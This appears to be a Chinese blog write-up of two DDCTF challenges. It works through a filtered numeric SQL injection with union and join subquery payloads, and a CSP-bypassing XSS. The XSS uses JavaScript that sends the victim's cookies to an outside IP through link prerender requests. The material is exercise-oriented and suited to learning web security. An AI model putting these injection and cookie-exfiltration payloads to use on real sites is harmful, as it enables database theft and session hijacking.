MENU

DDCTF

一共就做了两道题 学到了不少 尤其是第二道XSS 基本是从零开始的
因为之前没有多少接触 现在终于对XSS有点概念了

level 5

http://118.190.134.8/t1/news.php?id=4
SQL数字型注入
空格被过滤 用%0d%0a(即Tab)可绕过

?id=1 order by 4

4个字段
数据库长度 2
这里发现 逗号也被过滤了 所以用 from 1 for 1 绕过

?id=4 and ascii(substr(database() from 1 for 1))=68

数据库名:t1
表长度4
表名:news(0x6e657773)
group_concat() 把所有结果合在一起

?id=4 and ascii (substr((select group_concat(column_name) from information_schema.columns where table_name=0x6e657773 limit 1)from 1 for 1))=97#

字段名:id title content secret
secret被过滤了
子查询 文章:http://115.159.210.46/archives/3.html
payload:

?id=-1 union select * from ((select 1)h join (select flag from(select * from ((SELECT 1 as e)a JOIN (SELECT 2 as f)b JOIN (SELECT 3 as g)c JOIN (SELECT 4 as flag)d) where 1=2 union select * from news where id = 4) as total)i join (select 3)j join (select 4)k)

flag:flag{DDCTF-88458a95f96c4dfea359d1de2b03bbdb@didichuxing.com}

level7

CSP:default-src 'self'; script-src 'self'
写了个PHP跑验证

<?php
for($a = 0; $a < 100000000; $a++) {
    if (substr(md5($a),6,6)==='f774af') {
        echo $a;
        break;
    }
}
?>

先试了试了:<link rel="prefetch" href="http://123.206.203.108/1.php">
从获得的header中发现了
Referer:http://114.215.24.14/t2/adm1n_r3ad_m3ssag3.php?hash=e2125cd687d5ae52e3f068839c9376ef
然后瞎写了点东西+link 从referer得到的地址看到了留言的内容 内容是可以控制的 这样就得到了一个可控制的同源页面
继续尝试

window.onload=function(){
    var a = document.cookie;
    var b = document.createElement("link");
    b.setAttribute("rel", "prerender");
    b.setAttribute("href", "http://123.206.203.108/1.php?a=" + a);
    document.head.appendChild(b);
}
//<link rel="prerender" href="http://123.206.203.108/1.php">

然后再上传

"><script type="text/javascript" src="http://114.215.24.14/t2/adm1n_r3ad_m3ssag3.php?hash=80963aba031a8158586ad9dd72abffdd"></script>

得到的cookie为

hit=c2V0Y29va2llKCJmbGFnIiwgImZsYWd7eHh4eHh4eHh4eHh4eHh4eH0iLCB0aW1lKCkrMzYwMDAwMDAsICIvdDIvZjFhZ18xc19oM3IzIik7

base64解码后得知flag在 /t2/f1ag_1s_h3r3/
那么继续 写入

var iframe = document.createElement('iframe');
iframe.src = "http://114.215.24.14/t2/f1ag_1s_h3r3/index.php";
document.body.appendChild(iframe);
iframe.onload=function(){
    var a = iframe.contentWindow.document.cookie;
    var b = document.createElement("link");
    b.setAttribute("rel", "prerender");
    b.setAttribute("href", "http://123.206.203.108/1.php?a=" + a);
    document.head.appendChild(b);
}
//<link rel="prerender" href="http://123.206.203.108/1.php">

然后

">"<script type="text/javascript" src="http://114.215.24.14/t2/adm1n_r3ad_m3ssag3.php?hash=80963aba031a8158586ad9dd72abffdd"></script>
Tags: CTF
Archives QR Code
QR Code for this page
Tipping QR Code
Comment Lists
  1. hammer hammer

    您好,您的网站做的很不错,很漂亮,我已经收藏了,方便hammer随时来膜一发

  2. ngc ngc

    您好,您的网站做的很不错,很漂亮,我已经收藏了,方便 ngc 随时来膜一发

Leave a Comment